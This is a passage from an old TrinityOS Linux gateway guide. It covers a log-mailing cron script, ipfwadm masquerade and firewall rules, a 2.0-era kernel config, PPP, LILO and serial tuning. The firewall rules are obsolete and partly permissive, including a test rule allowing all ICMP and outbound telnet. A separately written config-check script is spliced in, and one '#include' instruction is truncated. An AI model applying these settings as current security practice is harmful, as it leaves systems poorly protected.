sed -e "/Terminated/d" -e "/Terminating/d" -e "/diald/d" -e "/2.2.0/d" -e "/Exit./d" $MSG.tmp > $MSG.tmp2
sed -e "/(passwd=guest)/d" -e "/alarm/d" -e "/Failed/d" $MSG.tmp2 > $MSG.tmp

#For messages - modem specific stuff (modem users: un-# this block)
#
#sed -e "/send /d" -e "/expect/d" -e "/OK/d" -e "/AT&F/d" -e "/ATZ/d" -e "/ ^M /d" $MSG.tmp > $MSG.tmp2
#sed -e "/Swansea/d" -e "/logging/d" -e "/starting/d" -e "/Ready/d" -e "/0x03f8/d" -e "/0x02f8/d" $MSG.tmp2 > $MSG.tmp
#sed -e "/sbpcd.c/d" -e "/CR-563/d" -e "/copyright/d" -e "/sockets/d" -e "/Serial/d" -e "/registered/d" $MSG.tmp > $MSG.tmp2
#sed -e "/SLIP/d" -e "/sbpcd-0/d" -e "/ATM0X7/d" -e "/1.44M/d" -e "/8272A/d" -e "/statistics/d" $MSG.tmp2 > $MSG.tmp
#sed -e "/Please/d" -e "/hangup/d" -e "/ip-down/d" -e "/scans/d" -e "/abort on/d" $MSG.tmp > $MSG.tmp2
#
##Build the call statistics table BEFORE the CONNECT/BUSY lines are deleted
#echo -e "---------------------------------------" > header.tmp
#echo -e "Trinity2 Call stats for \c" >> header.tmp
#date >> header.tmp
#echo -e " " >> header.tmp
#echo -e "Total number of connects: \c" >> header.tmp
#grep -c "CONNECT" $MSG.tmp2 >> header.tmp
#echo -e " 21600: \c" >> header.tmp
#grep -c "21600" $MSG.tmp2 >> header.tmp
#echo -e " 26400: \c" >> header.tmp
#grep -c "26400" $MSG.tmp2 >> header.tmp
#echo -e " 28800: \c" >> header.tmp
#grep -c "28800" $MSG.tmp2 >> header.tmp
#echo -e " 31200: \c" >> header.tmp
#grep -c "31200" $MSG.tmp2 >> header.tmp
#echo -e " 33600: \c" >> header.tmp
#grep -c "33600" $MSG.tmp2 >> header.tmp
#echo -e " 41333: \c" >> header.tmp
#grep -c "41333" $MSG.tmp2 >> header.tmp
#echo -e " 42666: \c" >> header.tmp
#grep -c "42666" $MSG.tmp2 >> header.tmp
#echo -e " " >> header.tmp
#echo -e "Total number of busys: \c" >> header.tmp
#grep -c "BUSY" $MSG.tmp2 >> header.tmp
#echo -e "---------------------------------------" >> header.tmp
#echo -e " " >> header.tmp
#
#sed -e "/CONNECT /d" -e "/BUSY/d" -e "/SIGHUP/d" $MSG.tmp2 > $MSG.tmp
#cat header.tmp >> $MSG.tmp
#rm header.tmp

#For messages - named specific stuff
#
sed -e "/Cleaned/d" -e "/USAGE/d" -e "/NSTATS/d" -e "/XSTATS/d" $MSG.tmp > $MSG.tmp2
sed -e "/points/d" -e "/Lame server/d" $MSG.tmp2 > $MSG.tmp

#For messages - SSH specific
sed -e "/Generating /d" -e "/generation /d" $MSG.tmp > $MSG.tmp2
mv $MSG.tmp2 $MSG
rm -f $MSG.tmp
mail -s "TrinityOS messages for $YDAY" $MAILTO < $MSG
rm $MSG
echo "parsed, filtered, mailed and deleted messages"

#---------------------------------------------
# /var/log/syslog
SYS=syslog.$STAMP
grep "$YDAY" /var/log/syslog > $SYS

#Syslog - modem specific (modem users: un-# these two lines)
#sed -e "/ got /d" -e "/abort on/d" -e "/expect/d" -e "/ ^M /d" -e "/AT&F1^M^M/d" -e "/ATZ^M^M/d" -e "/ATM0X7S11=40^M^M/d" -e "/Executed/d" -e "/ATDT/d" -e "/Welcome/d" -e "/Using/d" -e "/Connect/d" -e "/Remote/d" -e "/IP address/d" -e "/CHECKSUM/d" -e "/Terminated/d" -e "/Terminating/d" -e "/diald/d" -e "/2.2.0/d" -e "/Exit./d" -e "/(passwd=guest)/d" -e "/alarm/d" -e "/Failed/d" -e "/CONNECT/d" -e "/hangup/d" -e "/RINGING^M/d" $SYS > $SYS.tmp
#mv $SYS.tmp $SYS

#syslog - FTP chatter
sed -e "/PWD/d" -e "/PASV/d" -e "/LIST/d" -e "/CDUP/d" -e "/RETR/d" -e "/CWD/d" -e "/TYPE/d" -e "/PASS/d" -e "/QUIT/d" $SYS > $SYS.tmp

#syslog - general noise
sed -e "/send /d" -e "/expect/d" -e "/OK/d" -e "/AT&F/d" -e "/ATZ/d" -e "/ ^M /d" $SYS.tmp > $SYS.tmp2
sed -e "/Swansea/d" -e "/logging/d" -e "/starting/d" -e "/Ready/d" -e "/0x03f8/d" -e "/0x02f8/d" $SYS.tmp2 > $SYS.tmp
sed -e "/sbpcd.c/d" -e "/CR-563/d" -e "/copyright/d" -e "/sockets/d" -e "/Serial/d" -e "/registered/d" $SYS.tmp > $SYS.tmp2
sed -e "/SLIP/d" -e "/sbpcd-0/d" -e "/1.44M/d" -e "/8272A/d" -e "/statistics/d" $SYS.tmp2 > $SYS.tmp
sed -e "/Please/d" -e "/hangup/d" -e "/ip-down/d" -e "/scans/d" -e "/abort on/d" $SYS.tmp > $SYS.tmp2
mv $SYS.tmp2 $SYS
rm $SYS.tmp
mail -s "TrinityOS syslog for $YDAY" $MAILTO < $SYS
rm $SYS
echo "parsed, filtered, mailed and deleted syslog"

#---------------------------------------------
# /var/log/secure - drop the localhost (127.x) connections, keep the rest
SEC=secure.$STAMP
grep "$YDAY" /var/log/secure > $SEC
sed -e "/127/d" $SEC > $SEC.tmp
mv $SEC.tmp $SEC
mail -s "TrinityOS secure for $YDAY" $MAILTO < $SEC
rm $SEC
echo "parsed, filtered, mailed and deleted secure"

#---------------------------------------------
# /var/log/xferlog - mailed unfiltered
XFER=xferlog.$STAMP
grep "$YDAY" /var/log/xferlog > $XFER
mail -s "TrinityOS xferlog for $YDAY" $MAILTO < $XFER
rm $XFER
echo "parsed, filtered, mailed and deleted xferlog"

#---------------------------------------------
# /var/log/kernel - mailed unfiltered
KRN=kernel.$STAMP
grep "$YDAY" /var/log/kernel > $KRN
mail -s "TrinityOS kernel for $YDAY" $MAILTO < $KRN
rm $KRN
echo "parsed, filtered, mailed and deleted kernel"
--

- Now, make the file executable by running "chmod +x sendlogs"

- Next, you have to make cron run this script:

  Slackware users: Edit the file /var/spool/cron/crontabs/root and append the
  following:
  --
  # Run the sendlogs program at 12:00am everyday
  0 0 * * * /var/adm/sendlogs
  --

  Redhat users: Create the file /etc/cron.daily/sendlogs and enter in:
  ----
  #!/bin/sh
  cd /var/log
  ./sendlogs
  ----

- That's it. Now, make cron re-read its config files by doing:

    kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'`

================================================================================

Section 9 - MASQ startup and advanced firewall rulesets

- Create the file /etc/rc.d/rc.masq

  Slackware users: Put the module info in the /etc/rc.d/rc.modules file

  - NOTE: If you don't plan to use some of these modules, comment or
    un-comment the various lines (I've commented out cuseeme, vdolive, and
    raudio).
---
echo "Enabling IP MASQ, MASQ timeouts, MASQ modules and advanced firewalling"

#Load the MASQ modules

#BSDComp
/sbin/modprobe bsd_comp
#
echo Loading MASQ modules
#/sbin/modprobe ip_masq_cuseeme
/sbin/modprobe ip_masq_ftp
/sbin/modprobe ip_masq_irc
/sbin/modprobe ip_masq_quake
#/sbin/modprobe ip_masq_vdolive
/sbin/modprobe ip_masq_raudio
# Finished with MASQ modules

echo "Adding multicast route.."
/sbin/route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0

echo "Enabling IP Masquerading.."
echo "1" > /proc/sys/net/ipv4/ip_forwarding
#Note: Redhat users can enable this also by turning the
#      forward flag on in /etc/sysconfig/network
#
#      Change the forward line to
#      FORWARD_IPV4=true

# Startup MASQ with this ruleset FIRST..
# Once this works for you, "#" out the next (5) lines and un-"#" out
# the advanced firewall ruleset section below
/sbin/ipfwadm -F -p deny
/sbin/ipfwadm -F -a m -S 192.168.0.0/24 -D 0.0.0.0/0 -W eth0

echo "Extending MASQ timeouts.."
/sbin/ipfwadm -M -s 7200 10 120

#Enable Full packet firewalling.
#NOTE: These rulesets are borrowed from a few people and
#      the completeness of them is not yet 100% confirmed
#
#/etc/rc.d/rc.master-firewall

echo "rc.masq done."
----

- Make the rc.masq file executable

   chmod +x /etc/rc.d/rc.masq

- Create the file for future use once you have confirmed the initial MASQ
  functionality.

/etc/rc.d/rc.master-firewall
--
#!/bin/bash
# **Note**: This config ASSUMES that you have your private LAN
#           address as 192.168.0.x -AND- your static IP address
#           is 205.162.63.211.  Obviously, this is NOT your
#           static IP address.  So, you should use this following
#           script line instead (it pulls the current ppp0 address
#           out of ifconfig at boot time):
#
# extnic=`/sbin/ifconfig | grep -A 4 ppp0 | awk '/inet/ { print $2 }' | sed -e s/addr://`

intnic="192.168.0.1"
extnic="205.162.63.211"
universe="0.0.0.0/0"
localnet="192.168.0.0/24"
unprivports="1024:65535"

# Flush all the rules
/sbin/ipfwadm -I -f
/sbin/ipfwadm -O -f
/sbin/ipfwadm -F -f

# Set timeout values for masq sessions (seconds).
# I only did this because my telnet connections would drop after inactivity of 15
# mins.
/sbin/ipfwadm -M -s 7200 10 120

# Set the default policy of deny
/sbin/ipfwadm -I -p deny
/sbin/ipfwadm -O -p deny
/sbin/ipfwadm -F -p deny

# Allow ip masquerading for all internal hosts. We will handle security with
# the input and output filters on the external NIC.
/sbin/ipfwadm -F -a m -P all -S $localnet -D $universe

# Protection against ip spoofing on external interface.
/sbin/ipfwadm -I -a d -V $extnic -S $localnet -D $universe

# Incoming Rules on internal interface. Everyone behind the firewall can do
# anything they want.
/sbin/ipfwadm -I -a a -V $intnic -P all -S $universe -D $universe
# Next rule applies for stuff like talk
/sbin/ipfwadm -I -a a -V 127.0.0.1 -P all -S $universe -D $universe

# Outgoing Rules on internal interface
/sbin/ipfwadm -O -a a -V $intnic -P all -S $universe -D $universe
# Next rule applies for stuff like talk
/sbin/ipfwadm -O -a a -V 127.0.0.1 -P all -S $universe -D $universe

# Incoming Rules on external interface
/sbin/ipfwadm -I -a a -V $extnic -P tcp -k -S $universe -D $localnet $unprivports
##/sbin/ipfwadm -I -a a -V $extnic -P tcp -S $universe ftp-data -D $extnic $unprivports

# IDENT - Allow IDENT in but make sure it is disabled in /etc/inetd.conf
/sbin/ipfwadm -I -a a -P tcp -D $universe 113

# ------------------------------
# Specifically allowed machines: Add specific IP addresses to suit your needs
# ------------------------------
#Trinity
/sbin/ipfwadm -I -a a -P tcp -S $intnic -D $intnic www ftp \
   ftp-data pop-3 2112 2312 42 domain $unprivports
#rocko -------------------------
/sbin/ipfwadm -I -a a -W ppp0 -P tcp -S 132.241.185.20/32 -D $extnic \
   2112 2312 42 domain $unprivports
/sbin/ipfwadm -I -a a -V $extnic -P tcp -S $universe ftp-data -D $extnic $unprivports
# ------------------------------

#/sbin/ipfwadm -I -a a -V $extnic -P udp -S $universe -D $extnic 42 53 $unprivports
/sbin/ipfwadm -I -a a -P udp -S $universe -D $universe 42 53 $unprivports
/sbin/ipfwadm -I -a a -V $extnic -P icmp -S $universe -D $extnic
/sbin/ipfwadm -I -a a -W eth0 -P icmp -S $localnet -D $universe
#test
/sbin/ipfwadm -I -a a -P icmp -S $universe -D $universe

# Outgoing general rules:
# Allow IDENT out of the firewall interfaces but it will be disabled at inetd.conf
/sbin/ipfwadm -O -a a -P tcp -D $universe 113

# Outgoing Rules on local interfaces
/sbin/ipfwadm -O -a a -P tcp -S $universe -D $universe smtp www ftp ftp-data \
   pop-3 2312 42 domain $unprivports

# Outgoing Rules on external interface
/sbin/ipfwadm -O -a a -V $extnic -P tcp -S $universe -D $universe
/sbin/ipfwadm -O -a a -V $extnic -P tcp -S $extnic -D $universe
/sbin/ipfwadm -O -a a -V $extnic -P tcp -S $extnic smtp www ftp ftp-data \
   pop-3 telnet 42 domain -D $universe $unprivports
#/sbin/ipfwadm -O -a a -V $extnic -P udp -S $localnet -D $universe 42 53 $unprivports
/sbin/ipfwadm -O -a a -P udp -S $localnet -D $universe 42 53 $unprivports
/sbin/ipfwadm -O -a a -V $extnic -P udp -S $extnic -D $universe 42 53 $unprivports
# For local pings
/sbin/ipfwadm -O -a a -P icmp -S $localnet -D $universe
/sbin/ipfwadm -O -a a -V $extnic -P icmp -S $extnic -D $universe

# --------------------------------------------------------------
# Block everything that I have not explicitly allowed
# Do not edit below this line!

# Internal interface
/sbin/ipfwadm -I -a d -P all -V $intnic -S $universe -D $universe -o
/sbin/ipfwadm -O -a d -P all -V $intnic -S $universe -D $universe -o
# Local interface
/sbin/ipfwadm -I -a d -P all -V 127.0.0.1 -S $universe -D $universe -o
#/sbin/ipfwadm -O -a d -P all -V 127.0.0.1 -S $universe -D $universe -o
# External interface
/sbin/ipfwadm -I -a d -P all -V $extnic -S $universe -D $universe -o
/sbin/ipfwadm -O -a d -P all -V $extnic -S $universe -D $universe -o
#Done.
--

================================================================================
Section 10 - Initial Linux Kernel compiling

- FTP the kernel to "/usr/src/"

- Uncompress it (ie.
  "tar -xzvf linux-2.0.34.tgz")

- Configure it ("make config") - the config below is for my hardware, make
  changes to your config as necessary
--------
#
# Automatically generated make config: don't edit
#

#
# Code maturity level options
#
CONFIG_EXPERIMENTAL=y

#
# Loadable module support
#
CONFIG_MODULES=y
# CONFIG_MODVERSIONS is not set
# CONFIG_KERNELD is not set

#
# General setup
#
# CONFIG_MATH_EMULATION is not set
CONFIG_NET=y
# CONFIG_MAX_16M is not set
# CONFIG_PCI is not set
CONFIG_SYSVIPC=y
CONFIG_BINFMT_AOUT=y
CONFIG_BINFMT_ELF=y
# CONFIG_BINFMT_JAVA is not set
CONFIG_KERNEL_ELF=y
# CONFIG_M386 is not set
CONFIG_M486=y
# CONFIG_M586 is not set
# CONFIG_M686 is not set

#
# Floppy, IDE, and other block devices
#
CONFIG_BLK_DEV_FD=y
CONFIG_BLK_DEV_IDE=y

#
# Please see Documentation/ide.txt for help/info on IDE drives
#
# CONFIG_BLK_DEV_HD_IDE is not set
# CONFIG_BLK_DEV_IDECD is not set
# CONFIG_BLK_DEV_IDETAPE is not set
# CONFIG_BLK_DEV_IDEFLOPPY is not set
# CONFIG_BLK_DEV_IDESCSI is not set
# CONFIG_BLK_DEV_IDE_PCMCIA is not set
# CONFIG_BLK_DEV_CMD640 is not set
# CONFIG_IDE_CHIPSETS is not set

#
# Additional Block Devices
#
# CONFIG_BLK_DEV_LOOP is not set
# CONFIG_BLK_DEV_MD is not set
CONFIG_BLK_DEV_RAM=y
CONFIG_BLK_DEV_INITRD=y
# CONFIG_BLK_DEV_XD is not set
# CONFIG_BLK_DEV_HD is not set

#
# Networking options
#
CONFIG_FIREWALL=y
# CONFIG_NET_ALIAS is not set
CONFIG_INET=y
CONFIG_IP_FORWARD=y
CONFIG_IP_MULTICAST=y
CONFIG_SYN_COOKIES=y
CONFIG_RST_COOKIES=y
CONFIG_IP_FIREWALL=y
# CONFIG_IP_FIREWALL_VERBOSE is not set
CONFIG_IP_MASQUERADE=y

#
# Protocol-specific masquerading support will be built as modules.
#
CONFIG_IP_MASQUERADE_IPAUTOFW=y
CONFIG_IP_MASQUERADE_ICMP=y
# CONFIG_IP_TRANSPARENT_PROXY is not set
CONFIG_IP_ALWAYS_DEFRAG=y
# CONFIG_IP_ACCT is not set
CONFIG_IP_ROUTER=y
# CONFIG_NET_IPIP is not set
# CONFIG_IP_MROUTE is not set
# CONFIG_ARPD is not set

#
# (it is safe to leave these untouched)
#
CONFIG_INET_PCTCP=y
# CONFIG_INET_RARP is not set
# CONFIG_NO_PATH_MTU_DISCOVERY is not set
CONFIG_IP_NOSR=y
CONFIG_SKB_LARGE=y

#
#
#
# CONFIG_IPX is not set
# CONFIG_ATALK is not set
# CONFIG_AX25 is not set
# CONFIG_BRIDGE is not set
# CONFIG_NETLINK is not set

#
# SCSI support
#
CONFIG_SCSI=y

#
# SCSI support type (disk, tape, CD-ROM)
#
CONFIG_BLK_DEV_SD=y
CONFIG_CHR_DEV_ST=y
CONFIG_BLK_DEV_SR=y
# CONFIG_CHR_DEV_SG is not set

#
# Some SCSI devices (e.g. CD jukebox) support multiple LUNs
#
# CONFIG_SCSI_MULTI_LUN is not set
CONFIG_SCSI_CONSTANTS=y

#
# SCSI low-level drivers
#
# CONFIG_SCSI_7000FASST is not set
# CONFIG_SCSI_AHA152X is not set
CONFIG_SCSI_AHA1542=y
# CONFIG_SCSI_AHA1740 is not set
# CONFIG_SCSI_AIC7XXX is not set
# CONFIG_SCSI_ADVANSYS is not set
# CONFIG_SCSI_IN2000 is not set
# CONFIG_SCSI_AM53C974 is not set
# CONFIG_SCSI_BUSLOGIC is not set
# CONFIG_SCSI_DTC3280 is not set
# CONFIG_SCSI_EATA_DMA is not set
# CONFIG_SCSI_EATA_PIO is not set
# CONFIG_SCSI_EATA is not set
# CONFIG_SCSI_FUTURE_DOMAIN is not set
# CONFIG_SCSI_GENERIC_NCR5380 is not set
# CONFIG_SCSI_NCR53C406A is not set
# CONFIG_SCSI_PPA is not set
# CONFIG_SCSI_PAS16 is not set
# CONFIG_SCSI_QLOGIC_FAS is not set
# CONFIG_SCSI_SEAGATE is not set
# CONFIG_SCSI_T128 is not set
# CONFIG_SCSI_U14_34F is not set
# CONFIG_SCSI_ULTRASTOR is not set
# CONFIG_SCSI_GDTH is not set

#
# Network device support
#
CONFIG_NETDEVICES=y
CONFIG_DUMMY=m
# CONFIG_EQUALIZER is not set
# CONFIG_DLCI is not set
# CONFIG_PLIP is not set
CONFIG_PPP=y

#
# CCP compressors for PPP are only built as modules.
#
CONFIG_SLIP=y
CONFIG_SLIP_COMPRESSED=y
# CONFIG_SLIP_SMART is not set
# CONFIG_SLIP_MODE_SLIP6 is not set
# CONFIG_NET_RADIO is not set
CONFIG_NET_ETHERNET=y
CONFIG_NET_VENDOR_3COM=y
# CONFIG_EL1 is not set
# CONFIG_EL2 is not set
# CONFIG_ELPLUS is not set
# CONFIG_EL16 is not set
CONFIG_EL3=y
# CONFIG_VORTEX is not set
# CONFIG_LANCE is not set
# CONFIG_NET_VENDOR_SMC is not set
# CONFIG_NET_ISA is not set
# CONFIG_NET_EISA is not set
# CONFIG_NET_POCKET is not set
# CONFIG_TR is not set
# CONFIG_FDDI is not set
# CONFIG_ARCNET is not set

#
# ISDN subsystem
#
# CONFIG_ISDN is not set

#
# CD-ROM drivers (not for SCSI or IDE/ATAPI drives)
#
CONFIG_CD_NO_IDESCSI=y
# CONFIG_AZTCD is not set
# CONFIG_GSCD is not set
CONFIG_SBPCD=y
# CONFIG_SBPCD2 is not set
# CONFIG_MCD is not set
# CONFIG_MCDX is not set
# CONFIG_OPTCD is not set
# CONFIG_CM206 is not set
# CONFIG_SJCD is not set
# CONFIG_CDI_INIT is not set
# CONFIG_CDU31A is not set
# CONFIG_CDU535 is not set

#
# Filesystems
#
# CONFIG_QUOTA is not set
CONFIG_MINIX_FS=y
# CONFIG_EXT_FS is not set
CONFIG_EXT2_FS=y
# CONFIG_XIA_FS is not set
CONFIG_FAT_FS=y
CONFIG_MSDOS_FS=y
CONFIG_VFAT_FS=y
# CONFIG_UMSDOS_FS is not set
CONFIG_PROC_FS=y
CONFIG_NFS_FS=y
# CONFIG_ROOT_NFS is not set
CONFIG_SMB_FS=y
CONFIG_SMB_WIN95=y
CONFIG_ISO9660_FS=y
# CONFIG_HPFS_FS is not set
# CONFIG_SYSV_FS is not set
# CONFIG_AUTOFS_FS is not set
# CONFIG_AFFS_FS is not set
# CONFIG_UFS_FS is not set

#
# Character devices
#
CONFIG_SERIAL=y
# CONFIG_DIGI is not set
# CONFIG_CYCLADES is not set
# CONFIG_STALDRV is not set
# CONFIG_RISCOM8 is not set
CONFIG_PRINTER=y
# CONFIG_SPECIALIX is not set
# CONFIG_MOUSE is not set
# CONFIG_UMISC is not set
# CONFIG_QIC02_TAPE is not set
# CONFIG_FTAPE is not set
# CONFIG_APM is not set
# CONFIG_WATCHDOG is not set
# CONFIG_RTC is not set

#
# Sound
#
CONFIG_SOUND=y
# CONFIG_LOWLEVEL_SOUND is not set

#
# Kernel hacking
#
# CONFIG_PROFILE is not set
--------

- edit /usr/src/linux/include/linux/sbpcd.h
  (as of 2.0.33)

   - Roughly at line 77, verify that the top-most SB address and CDROM port
     are correct.

   - Roughly at line 107, change the "#define DISTRIBUTION" variable to "0" to
     reflect that you have configured the sound drivers

   - Roughly at lines 121 and 128, change ALL eject line variables to "0" so
     the drives won't eject their CDs

Now we need to shift gears and jump to the PPP code installation to verify
whether there is any newer code in the PPP distribution than in the kernel
distribution.

- Kernel 2.0.34 didn't come with the new v1.16 3Com driver. Bummer. It was
  pulled because of problems but I haven't had any and there are a LOT of
  fixes in it. So.. do the following:

   - mv /usr/src/linux/drivers/net/3c509.c /usr/src/linux/drivers/net/3c509.c.orig

   - Download the new driver from:

        ftp://cesdis.gsfc.nasa.gov/pub/linux/drivers/3c509.c

     If, for some reason, the driver is not available, email me and I'll mail
     it to you.

================================================================================
Section 11 - Compile PPPd

- Download PPP from the top URL and put it in "/usr/src"

- "tar -xvzf ppp-2.3.2.tar.gz"

- "cd ppp-2.3.2"

- "configure"

- Now, some patches won't need to be installed, depending on the version of
  PPPD and/or the Linux kernel you are installing.

- "make"

   NOTE: You can use "make USE_MS_DNS=1" to ensure your system uses the ISP's
         offered DNS servers over your statically configured ones. Remember,
         since TrinityOS will run its OWN DNS server, it really won't matter.

- "make install"

Ok.. now back to the kernel configuring for now..
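Before building the kernel in the next section it is worth confirming that the .config still carries the firewalling and masquerading options that the rc.masq and rc.master-firewall scripts of Section 9 depend on; "make config" is easy to mis-answer. The check below is an added example, not TrinityOS code: the list of required options is my own assumption taken from the .config shown above, and the two sample fragments are constructed, not real files.

```shell
#!/bin/sh
# Added example (not TrinityOS code): verify that a 2.0.x kernel .config has
# the networking options the MASQ/firewall scripts in Section 9 depend on.
# REQUIRED_OPTS is an assumption drawn from the .config shown in Section 10.
REQUIRED_OPTS="CONFIG_MODULES CONFIG_NET CONFIG_INET CONFIG_FIREWALL \
CONFIG_IP_FIREWALL CONFIG_IP_FORWARD CONFIG_IP_MASQUERADE \
CONFIG_IP_ALWAYS_DEFRAG CONFIG_SYN_COOKIES CONFIG_PPP"

# Read a .config on stdin and print, one per line, every required option that
# is neither =y nor =m (i.e. absent, or present as "# CONFIG_X is not set").
check_masq_config() {
    _cfg=$(cat)
    for opt in $REQUIRED_OPTS; do
        printf '%s\n' "$_cfg" | grep -q "^${opt}=[ym]\$" || echo "$opt"
    done
}

# Convenience wrapper: exit 0 if the .config on stdin is complete, 1 otherwise.
masq_config_ok() {
    [ -z "$(check_masq_config)" ]
}

# Constructed sample fragments (not real .config files): one complete, and one
# with masquerading switched off and the SYN cookie option missing entirely.
SAMPLE_OK='CONFIG_MODULES=y
CONFIG_NET=y
CONFIG_INET=y
CONFIG_FIREWALL=y
CONFIG_IP_FIREWALL=y
CONFIG_IP_FORWARD=y
CONFIG_IP_MASQUERADE=y
CONFIG_IP_ALWAYS_DEFRAG=y
CONFIG_SYN_COOKIES=y
CONFIG_PPP=m'

SAMPLE_BAD='CONFIG_MODULES=y
CONFIG_NET=y
CONFIG_INET=y
CONFIG_FIREWALL=y
CONFIG_IP_FIREWALL=y
CONFIG_IP_FORWARD=y
# CONFIG_IP_MASQUERADE is not set
CONFIG_IP_ALWAYS_DEFRAG=y
CONFIG_PPP=y'

# Demo run over the two samples. On a real box:
#   check_masq_config < /usr/src/linux/.config
for name in SAMPLE_OK SAMPLE_BAD; do
    eval "sample=\$$name"
    missing=$(printf '%s\n' "$sample" | check_masq_config)
    if [ -z "$missing" ]; then
        echo "$name: all required options present"
    else
        echo "$name: missing or unset:" $missing
    fi
done
```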
================================================================================
Section 12 - Final Linux Kernel compiling and installation

- Next, "make clean", "make dep", "make zImage" and allow for the kernel to
  compile (~3mins on a P-II 233)

- Now, compile and install the necessary system modules:

   "make modules"
   "make modules_install"

- Once the kernel has compiled, do the following command line (replacing "XYZ"
  with an identifying name like "2031-masq"):

   Slackware: "cp /usr/src/linux/arch/i386/boot/zImage /XYZ"
   Redhat:    "cp /usr/src/linux/arch/i386/boot/zImage /boot/XYZ"

================================================================================
Section 13 - Lilo configuration and installation

- Edit the /etc/lilo.conf file to reflect your new kernel.

   **NOTE: If you aren't using LILO, you need to configure your boot method
           (loadlin, NT boot loader, OS/2 boot loader, System Commander, etc)
           to use this new kernel.

- Add an entry like the one below:

# LILO configuration file
# generated by 'liloconfig'
#
# Start LILO global section
boot = /dev/hda
append="ether=0,0,eth1"
#compact        # faster, but won't work on all systems.
delay = 50
vga = normal    # force sane state
# ramdisk = 0   # paranoia setting
# End LILO global section
# Linux bootable partition config begins
image = /2033-1542-sb16
  root = /dev/hda6
  label = linux
  read-only # Non-UMSDOS filesystems should be mounted read-only for checking
# Linux bootable partition config ends

** Cablemodem users: **

   For a secure system, you should have (2) ethernet cards installed: one to
   the cablemodem and the other for the internal LAN. If the two installed
   Ethernet cards are from different vendors, then skip this next part.

   If the two Ethernet cards are identical, Linux will only autodetect ONE
   card. To make Linux look for additional ethernet cards, add the following
   to the lilo.conf file:

      append="ether=0,0,eth1"

- type "lilo" to re-write your boot sector.
  If everything is ok, you will be given a short list of boot images that LILO
  will boot from.

================================================================================
Section 14 - Additional RC script configuration and network optimization

Since my system uses all (4) COMM ports and Linux doesn't like to share
interrupts (IRQs), you have to tell Linux how to use your specific hardware
setup. In addition to configuring Linux to understand your hardware setup, you
need to optimize it for maximum performance (serial ports, etc).

NOTE: Until I added these changes, both GPM (tty mouse program) and Xwindows
      (Xfree86, MetroX, etc) would not load correctly, let alone be useful.

Create or add the following lines to the /etc/rc.d/rc.serial file:
----
echo "Configuring COM1 for 115200"
${SETSERIAL} /dev/ttyS0 spd_vhi

echo "RE-configuring COM3 and COM4 to use proper IRQs"
${SETSERIAL} /dev/ttyS2 uart 16450 port 0x3E8 irq 3
${SETSERIAL} /dev/ttyS3 uart 16550A port 0x2E8 irq 5

${SETSERIAL} -bg /dev/ttyS0 /dev/ttyS1 /dev/ttyS2 /dev/ttyS3
echo "rc.serial done."
----

If you just created this file, do the following:

   Add the following text to the very top lines of the /etc/rc.d/rc.serial
   file:

      #!/bin/sh
      SETSERIAL="/bin/setserial -b"

   chmod +x /etc/rc.d/rc.serial

   Redhat: Add the following to the end of the /etc/rc.d/rc.sysinit file:

      # Initialize the serial subsystem
      /etc/rc.d/rc.serial

Since I use an older Logitech C7 mouse, Linux doesn't come on-line with it the
first time. Fix this by doing:

   Redhat: Edit /etc/rc.d/init.d/gpm

      replace this:  daemon gpm -t $MOUSETYPE
      with this:     daemon gpm -b 9600 -r 50 -t $MOUSETYPE

   Slackware: Edit /etc/rc.d/rc.local

      replace this:  gpm -t logi
      with this:     gpm -b 9600 -r 50 -t logi

Network Optimization:

Both Slackware and Redhat, out of the box, do NOT optimize the TCP/IP window
size.
This can make a BIG difference with performance:

   Redhat5: Edit "/etc/sysconfig/network-scripts/ifup" and around lines 119
            and 134, find the lines:

               "route add -net ${NETWORK} netmask ${NETMASK} ${DEVICE}"
            and
               "route add default gw ${GATEWAY} ${DEVICE}"

            and change them to:

               "route add -net ${NETWORK} netmask ${NETMASK} window 8192 ${DEVICE}"
            and
               "route add default gw ${GATEWAY} window 8192 ${DEVICE}"

   Slackware: Edit "/etc/rc.d/rc.inet1" and around lines 47 and 49, find the
              following text (note: your setup might look a little different
              so make any changes that are needed for your setup)

               "/sbin/route add -net ${NETWORK} netmask ${NETMASK} eth0"
              and
               "if [ ! "$GATEWAY" = "" ]; then
                  /sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 metric 1
                fi"

              and replace them with the following:

               "/sbin/route add -net ${NETWORK} netmask ${NETMASK} window 8192 eth0"
              and
               "if [ ! "$GATEWAY" = "" ]; then
                  /sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 window 8192 metric 1
                fi"

================================================================================
Section 15 - Patching, Compiling, and installing IPFWADM

- FTP the ipfwadm source code tgz or RPM file to "/usr/src/"

- Un-compress the IPFWADM tgz file ("tar -xzvf ipfwadm-2.3.0.tgz") or install
  the RPM file ("rpm -i ipfwadm-2.3.0-1.i386.rpm")

   Note: If you already installed IPFWADM and the above RPM installation
         didn't work, don't worry, the stock IPFWADM that comes with Redhat
         will work ok.

- FTP the IPFWADM timeout patch to /usr/src/ipfwadm-2.3.0

- Un-compress the IPFWADM patch
  ("gunzip ipfwadm-2.3.0-generic-timeout.patch.gz")

- Apply the timeout patch: "patch -p0 < ipfwadm-2.3.0-generic-timeout.patch"

- Make sure that all "Hunks Succeed"

- Edit the "ipfwadm.c" file

   - At line 107, insert this line: #include

- Compile IPFWADM by doing:

   "make"
   "make install"

================================================================================
Section 16 - Mail aliases for system administration

- Aliases

   Edit the /etc/aliases file and insert the following:

      root:       your-email-address@your-isps.domain
      webmaster:  your-email-address@your-isps.domain
      postmaster: your-email-address@your-isps.domain

================================================================================
Section 17 - Preparing for reboot and clearing the logs

- For trouble shooting, do the following:

   Slackware:
      "mv /var/adm/messages /var/adm/messages.old"
      "touch /var/adm/messages"
      "mv /var/adm/syslog /var/adm/syslog.old"
      "touch /var/adm/syslog"
      "mv /var/adm/debug /var/adm/debug.old"
      "touch /var/adm/debug"

   Redhat:
      "mv /var/log/messages /var/log/messages.old"
      "touch /var/log/messages"
      "mv /var/log/syslog /var/log/syslog.old"
      "touch /var/log/syslog"
      "mv /var/log/debug /var/log/debug.old"
      "touch /var/log/debug"

- Reboot with the new kernel

- Once the computer has rebooted, look at the /var/adm/messages and
  /var/adm/syslog files to make sure no errors or problems were found. If
  there were errors.. fix them before you continue.
================================================================================
Section 18 - Verifying MASQ module installation

- Next, make sure all of the IP MASQ modules are running by typing in "lsmod"

- You will see the following:

   trinity2:/usr/src/ppp-2.2.0g# lsmod
   Module:         #pages:  Used by:
   ip_masq_raudio     1            0
   ip_masq_quake      1            0
   ip_masq_irc        1            0
   ip_masq_ftp        1            0
   bsd_comp           1            0

